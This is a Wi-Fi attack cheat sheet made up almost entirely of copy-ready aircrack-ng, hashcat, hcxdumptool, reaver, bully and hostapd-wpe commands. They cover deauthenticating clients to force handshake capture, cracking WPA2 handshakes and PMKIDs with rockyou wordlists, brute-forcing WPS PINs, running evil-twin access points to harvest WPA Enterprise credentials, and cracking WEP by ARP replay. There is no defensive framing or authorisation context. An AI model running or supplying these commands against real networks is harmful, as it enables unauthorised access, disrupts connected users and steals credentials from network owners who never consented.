WiFi Hacking

Monitor Mode

# Check interface name
iwconfig

# Enable monitor mode
airmon-ng start wlan0

# Kill interfering processes first
airmon-ng check kill
airmon-ng start wlan0

# Disable monitor mode
airmon-ng stop wlan0mon

Scanning & Capture

# Scan for nearby networks
airodump-ng wlan0mon

# Target a specific network and capture handshakes
airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

WPA/WPA2 Handshake Capture

# Deauth a client to force handshake (run alongside airodump-ng)
aireplay-ng --deauth 10 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

# Deauth all clients on AP
aireplay-ng --deauth 0 -a <AP_MAC> wlan0mon

Cracking Handshakes

# Aircrack-ng — dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

# Hashcat — convert cap to hc22000 first
hcxpcapngtool -o capture.hc22000 capture.cap

# Crack with hashcat (WPA2)
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

# Dictionary + rules
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

PMKID Attack (no deauth needed)

# Capture PMKID
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1

# Convert and crack
hcxpcapngtool -o capture.hc22000 capture.pcapng
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

WPS Attacks

# Scan for WPS-enabled APs
wash -i wlan0mon

# Reaver — WPS PIN brute force
reaver -i wlan0mon -b <AP_MAC> -vv

# Bully — alternative WPS brute force
bully wlan0mon -b <AP_MAC> -d -v 3

Evil Twin / Rogue AP

# Create a rogue AP with hostapd-wpe (WPA Enterprise credential capture)
hostapd-wpe hostapd-wpe.conf

# Lightweight rogue AP with hostapd
hostapd hostapd.conf

# Software AP with airbase-ng (AP only; airbase-ng itself does not provide a captive portal)
airbase-ng -e "<SSID>" -c <channel> wlan0mon

WEP (Legacy)

# Capture IVs
airodump-ng -c <channel> --bssid <AP_MAC> -w wep_capture wlan0mon

# ARP replay to generate traffic
aireplay-ng -3 -b <AP_MAC> -h <CLIENT_MAC> wlan0mon

# Crack once enough IVs collected (~50k+)
aircrack-ng wep_capture.cap

Useful Tools

Tool             Purpose
aircrack-ng      Suite for WEP/WPA cracking
hcxdumptool      PMKID/handshake capture
hcxpcapngtool    Convert pcap to hashcat format
hashcat          GPU-accelerated cracking
reaver / bully   WPS PIN attacks
hostapd-wpe      WPA Enterprise evil twin
kismet           Wireless network detector/sniffer
wifite           Automated WiFi attack tool